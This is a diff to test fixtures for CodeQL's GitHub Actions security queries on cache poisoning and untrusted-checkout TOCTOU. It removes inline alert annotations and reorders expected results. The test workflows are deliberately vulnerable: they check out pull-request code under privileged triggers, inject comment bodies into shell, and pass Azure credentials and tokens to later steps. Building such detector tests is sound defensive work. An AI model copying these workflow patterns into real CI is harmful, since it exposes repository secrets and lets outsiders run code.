.github/actions-scripts/what-docs-early-access-branch.js diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml index 60be3c02edb0..60ba26406c62 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml @@ -17,11 +17,11 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] + - name: Setup Pages uses: actions/configure-pages@v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@v1 with: source: ./ - destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] + destination: ./_site diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml index 7ceb82a536f1..8539bf2bda43 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -16,4 +16,4 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm run build -w www # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] + - run: npm run build -w www diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml index 33d28c1f292d..6e2351c17446 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -15,4 +15,4 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: ./foo # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] + - run: ./foo diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml index 082585088b1d..9742bd01a48a 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -19,10 +19,10 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] + - name: Setup Pages uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ - destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] + destination: ./_site diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index be669230722c..9cfac091f675 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -1,5 +1,3 @@ -#select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | nodes @@ -8,3 +6,5 @@ nodes | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref index 62a04c8718c8..8ac48aad93e0 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-349/CachePoisoningViaCodeInjection.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-349/CachePoisoningViaCodeInjection.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 4014714be4b7..4cc8536b5943 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -1,10 +1,3 @@ -#select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | @@ -50,3 +43,10 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref index 0002f755786f..9d1910990fc0 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-349/CachePoisoningViaDirectCache.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-349/CachePoisoningViaDirectCache.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index 57a1fd7b8d87..6b1a3e873134 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -1,11 +1,3 @@ -#select -| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | @@ -51,3 +43,11 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref index 9855767d1a86..89db21d70f59 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-349/CachePoisoningViaPoisonableStep.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-349/CachePoisoningViaPoisonableStep.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml index abea1002fd38..a4acd7387660 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] + - run: bash comment_example/tests.sh - test3: # $ Alert[actions/untrusted-checkout-toctou/critical] + test3: if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] + - run: bash comment_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml index abea1002fd38..a4acd7387660 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml @@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] + - run: bash comment_example/tests.sh - test3: # $ Alert[actions/untrusted-checkout-toctou/critical] + test3: if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] + - run: bash comment_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml index 937f223a5a2f..9444ad0b627c 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml @@ -82,8 +82,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup # $ Source[actions/untrusted-checkout-toctou/critical] + - name: Environment setup uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Alert[actions/untrusted-checkout-toctou/critical] + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml index 5cd25eb52cba..e3e557cc5112 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml @@ -90,7 +90,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment # $ Source[actions/untrusted-checkout-toctou/critical] + - name: Get environment from comment id: environment shell: bash env: @@ -153,7 +153,7 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Deploy server # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Deploy server if: >- ${{ (contains(github.event.comment.body, '/deploy to') || @@ -166,7 +166,7 @@ jobs: COMMENT_BODY: ${{ github.event.comment.body }} run: poetry run python server.py --endpoint_location=remote --autodeploy=True - - name: Deploy scorer # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Deploy scorer if: >- ${{ contains(github.event.comment.body, '/deploy as async scorer') || @@ -177,7 +177,7 @@ jobs: PR_NUMBER: ${{ github.event.issue.number }} run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True - - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Set latest commit status as ${{ job.status }} uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml index bf14336adb66..4a6d1452af24 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml @@ -44,7 +44,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI # $ Alert[actions/untrusted-checkout-toctou/high] + - name: Install GH CLI uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -94,7 +94,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure # $ Alert[actions/untrusted-checkout-toctou/high] + - name: Log into Azure uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} @@ -164,7 +164,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get pipeline info from comment # $ Source[actions/untrusted-checkout-toctou/critical] + - name: Get pipeline info from comment id: pipeline-info run: | model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ @@ -215,13 +215,13 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Kickoff run # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Kickoff run if: contains(github.event.comment.body, '/kickoff') env: BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} - - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Set latest commit status as ${{ job.status }} uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index cf212950f1e2..da66ff822a39 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,14 +1,3 @@ -#select -| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | @@ -107,3 +96,14 @@ edges | .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | +#select +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | 